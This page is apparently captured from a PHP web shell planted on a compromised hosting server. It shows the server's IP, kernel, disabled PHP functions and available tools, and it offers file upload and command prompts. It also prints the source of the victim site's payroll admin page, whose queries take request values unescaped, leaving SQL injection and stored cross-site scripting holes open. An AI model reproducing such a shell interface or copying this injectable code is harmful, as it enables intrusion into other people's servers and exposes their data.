X3ND1 GANTENG
Server IP : 108.163.255.210  /  Your IP : 3.17.78.184
Web Server : Apache
System : Linux blossom.urlnameserver.com 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
User :  ( 1172)
PHP Version : 7.2.34
Disable Function : eval,escapeshellarg,proc_close,proc_get_status,proc_nice,proc_open,symlink,system,pcntl_exec,getrusage,chown,chgp,closelog,openlog,syslog,define_syslog_variables,php_ini_loaded_file,getservbyname,getservbyport,posix_getgid,posix_getgrgid,proc_terminate,pfsockopen,apache_child_terminate,posix_mkfifo,posix_setpgid,posix_setuid,hypot,pg_host,pos,posix_access,posix_getcwd,posix_getservbyname,myshellexec,getpid,posix_getsid,posix_isatty,posix_kill,posix_mknod,posix_setgid,posix_setsid,posix_setuid,posix_times,posix_uname,ps_fill,posix_getpwuid,global,ini_restore,zip_open,zip_read,rar_open,bzopen,bzread,bzwrite,apache_get_modules,apache_get_version,phpversionphpinfo,php_ini_scanned_files,get_current_user,disk_total_space,diskfreespace,leak,imap_list,hypo,filedump,safe_mode,getmygid,apache_getenv,apache_setenv,bzread,bzwrite,bzopen,phpini,higlight_file,dos_conv,get_cwd,er_log,cmd,e_name,vdir,get_dir,only_read,ftok,ftpexec,posix_getpwnam,mysql_list_dbs,disk_free_space,session_save_path,confirm_phpdoc_compiled,zip_entry_rea,php_u,psockopen,crack_opendict,crack_getlastmessage,crack_closedict,crack_check,fpassthru,posix_get_last_error,posix_getlogin,posix_getgroups,posix_strerror,posix_getrlimit,posix_getpgrp,posix_getgrnam,pos,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/unilinki/public_html/payroll/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ BERANDA ]     

Current File : /home/unilinki/public_html/payroll/admin/view.php
<?php
session_start();
if(!isset($_SESSION["adminuser"]) || $_SESSION["adminuser"]=="")
{
	header("Location:login.php");
	exit;
}
require_once("../include/db.php");
$read=mysql_query("update `message` set `read`='1' where `rand`='".$_GET['rand']."' && `userid`='".$_SESSION['admin_id']."'");

if($_SESSION['admin_id']!="" & $_GET['sno']!="" & $_GET['rand']!="")
{
	
	$up=mysql_query("update message set akn='1' where userid='".$_SESSION['admin_id']."' && rand='".$_GET['rand']."' && sno='".$_GET['sno']."'");
	if($up>0)
	{
	
		$g=$_GET['rand'];
		echo "<script>window.location='view.php?rand=$g'</script>";
	}
}

require_once("header.php");
?>
<script type="text/javascript" src="../ckeditor/ckeditor.js"></script>

<script>
if ( !CKEDITOR.env.ie || CKEDITOR.env.version > 7 )
   CKEDITOR.env.isCompatible = true;
   </script>
<!----header ends-->
      <!-- Left side column. contains the logo and sidebar -->
      <?php
	  require_once("left.php");
	  ?>

      <!-- Content Wrapper. Contains page content -->
      <div class="content-wrapper">
        <!-- Content Header (Page header) -->
        <section class="content-header">
        <?php $head=mysql_fetch_array(mysql_query("select * from message where rand='".$_GET['rand']."' && userid='".$_SESSION['admin_id']."'")); ?>
          <h1><?php echo $head['subject']; ?></h1>
          <ol class="breadcrumb">
            <li><a href="dashboard.php"><i class="fa fa-dashboard"></i> Home</a></li>
			<li class="active">Inbox</li>
          </ol>
        </section>

        <!-- Main content -->
        <section class="content">
          <div class="row">
            <div class="col-xs-12">
              <div class="box">
              
                <div class="box-body">
                
                <?php $message=mysql_query("select * from message where rand='".$_GET['rand']."' && (userid='".$_SESSION['admin_id']."' || senderid='".$_SESSION['admin_id']."')");while($m=mysql_fetch_array($message)){?>
                  <table id="example1" class="table table-bordered table-hover" style="margin-bottom:5px;">
                   <tr>
                   <td style="width:5%; font-weight:bold;" align="center"><i class="fa fa-user" style="font-size:36px"></i><?php $rname=mysql_fetch_array(mysql_query("select first_name,last_name from admin where admin_id='".$m['senderid']."'")); echo $rname['first_name']; ?></td><td style="width:80%"><?php echo $m['message']; ?></td><td style="font-weight:600; text-align:center;" ><div><?php if($m['akn']==1 || $_SESSION['admin_id']==$m['senderid']){}else{?><a href="view.php?rand=<?php echo $m['rand'] ?>&sno=<?php echo $m['sno'] ?>"><button>Aknowledge</button></a><?php } ?><?php if ($_SESSION['role_id']=='1' || $_SESSION['role_id']=='2'){?> <?php if($_SESSION['admin_id']==$m['senderid']){}else { ?><a href="#edit"><button ><i class="fa fa-mail-reply"></i></button></a><?php } }?></div><div style="margin-top:10px;"><?php echo $m['TYM']; ?></td>
                   </tr> 
                  </table>
                  <?php } ?>
                 <?php if ($_SESSION['role_id']=='1' || $_SESSION['role_id']=='2'){?>
                  <?php $reply=mysql_query("select roleid,classid from admin where admin_id='".$head['senderid']."'") ;
				 $r=mysql_fetch_array($reply);
				   ?>
                  <table id="edit" class="table table-bordered table-hover" style=" margin-top:10px;">
                  <form name="" action="" method="post" enctype="multipart/form-data">
                  <tr><td ><input type="hidden" name="rgid" value="<?php echo $r['roleid'] ?>"/><input type="hidden" name="ruid" value="<?php echo $head['senderid'] ?>"/><input type="hidden" name="rcid" value="<?php echo $r['classid']; ?>"/><textarea class="ckeditor" name="message" id="ckeditor"></textarea></td></tr><tr><td style="text-align:right;"><input type="submit" name="smt" id="smt" value="Send" class="btn btn-info pull-right"></td></tr>
                  </form>
                  </table>
                  <?php } ?>
                </div><!-- /.box-body -->
              </div><!-- /.box -->
            </div><!-- /.col -->
          </div><!-- /.row -->
        </section><!-- /.content -->
      </div><!-- /.content-wrapper -->
<?php
require_once("footer.php");
?>
<?php 
if(isset($_POST['smt']))
{
	
$done=mysql_query("INSERT INTO `message`(`senderid`, `groupid`, `userid`,`classid`, `subject`, `message`, `akn`, `rand`, `TYM`) VALUES ('".$_SESSION['admin_id']."','".$_POST['rgid']."','".$_POST['ruid']."','".$_POST['rcid']."','".$head['subject']."','".$_POST['message']."','','".$head['rand']."',NOW())");
if($done>0) 
{
	echo "<script>alert('Thanks! Message sent');</script>";
	$n=$head['rand'];
	echo "<script>window.location='view.php?rand=$n'</script>";
}
}
?>

Anon7 - 2022
SCDN GOK